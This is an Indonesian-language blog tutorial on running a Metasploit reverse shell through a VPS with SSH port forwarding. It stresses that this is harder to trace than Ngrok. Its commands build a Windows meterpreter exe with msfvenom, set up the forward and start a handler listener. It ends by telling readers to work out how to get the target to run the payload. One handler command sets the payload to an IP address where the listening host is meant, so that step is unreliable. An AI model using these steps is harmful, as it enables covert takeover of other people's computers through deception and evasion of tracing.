-->

RAT/Reverse Shell Di SSH Menggunakan Metasploit: Menggunakan Method Port Forwading


Reverse shell Di SSH Menggunakan Metasploit: Menggunakan Method Port Forwading - Saat ingin melakukan reverse shell maka kita perlu server yang digunakan untuk menerima data dari target. Biasanya target yang masih dalam satu network maka hanya perlu menggunakan localhost. Namun jika target berbeda koneksi/network maka kita perlu server yang bisa diakses, Ngrok menjadi salah satu software yang biasa digunakan untuk port forwading namun durasi dari Ngrok terbatas dan lebih tidak secure/aman maka dari itu kita perlu alternative lain yaitu dengan SSH/VPS.

Apa itu SSH Tunneling/SSH Port Forwading?

SSH Tunneling atau sering disebut SSH Port Forwading adalah teknik yang digunakan untuk mengarahkan lalu lintas 

Mengapa harus SSH/VPS?.

1. Lebih anonim. Saat menggunakan VPS/SSH, anda dapat memanfaatkan keamanan yang baik dari SSH/VPS selain itu prosesnya terjadi di VPS/SSH jadi lebih susah untuk dilacak / dipantau berbeda dengan Ngrok yang menggunakan localhost sebagai Port Forwading jadi lebih gampang di lacak.

2. Durasi tidak terbatas (tergantung masa sewa/suspend dari ssh itu).

3. Lebih cepat. karena SSH/VPS yang dibuat dengan penyedia layanan cloud memiliki internet yang cepat dan stabil dibandingkan memakai Ngrok yang memakai internet sendiri.

Awalnya saya mencoba Port Forwading dari server SSH/VPS saya ke localhost saya sendiri. dan terbukti itu tidak work karena endpoint nya sendiri berada di localhost saya yang hanya bisa diakses oleh yang berada dalam 1 network. Jadi disini saya berpikir bagaimana cara saya menjadikan VPS/SSH saya sebagai listener untuk payload Metasploit?. Setelah experiment yang cukup panjang disini sayang menemukan jawabannya yaitu dengan Port Forwading di VPS/SSH menggunakan IP/Server VPS/SSH saya sendiri dengan begitu Port Forwading akan mengarah ke server saya sendiri.

Tutorial :

1. Pastikan IP VPS/SSH kalian bisa diakses secara publik, kalian bisa mencobanya dengan mengakses IP VPS/SSH kalian di browser.

Jika IP server SSH/VPS kalian masih belum bisa di akses secara public kalian bisa mencoba tutorial sebagai berikut:

1. Pastikan kalian login sebagai root.

ssh root@example.com

2. Install apache2 (jika belum terinstall)

apt install apache2 # untuk debian/keturunannya.

3. enable dan start apache2

systemctl enable apache2
systemctl start apache2

4. Update firewall configuration agar Port HTTP/S bisa diakses.

ufw allow 80
ufw allow 443

jika command not found kalian bisa install ufw terlebih dahulu

apt install ufw 

5. Restart ssh dan apache2

systemctl restart sshd
systemctl restart apache2

Lalu kalian coba akses IP VPS/SSH kalian di browser. jika belum bisa terkoneksi restart VPS/SSH kalian

Jika IP kalian sudah bisa terkoneksi secara public, siapkan 2 terminal di local machine.

kalian login terlebih dahulu ke SSH/VPS kalian dengan 2 terminal tersebut.

ssh root@example.com

Jika kalian belum menginstall metasploit maka install terlebih dahulu. gunakan link dibawah ini untuk dokumentasi penginstallan metasploit.

https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html 

1. Buat payload dengan msfvenom.

Disini saya menargetkan windows machine jadi saya akan membuat payload exe.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip vps kalian> LPORT=<port bebas> -f exe > payload.exe

Lalu jika payload sudah terbuat kalian jalankan command berikut untuk melakukan Port Forwading.

ssh -R <port>:<ip ssh kalian>:80 root@<ip ssh kalian>

pada bagian port isi dengan port yang kalian inputkan di LPORT= pada msfvenom. dan kalian login seperti biasa. Example :

ssh -R 1337:45.34.54.64:80 root@45.34.54.64

Beralih ke terminal satunya. gunakan untuk menkonfigurasi listener dari machine kita agar bisa menerima dari data dari payload ketika di running oleh mesin target.

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set payload <ip vps kalian>

set lport <port yang di inputkan tadi>

run  

Setelah itu kalian tinggal mengeksekusi payload di mesin target (pake otaklo biar gimana caranya si target mau ngerun payload yang lo kasih).

Penutupan

Mungkin segitu aja materi kali ini. jika ada error/kesalahan kalian bisa berkomentar. terimakasih!

Keep calm and Stay Quiet

 


See Also :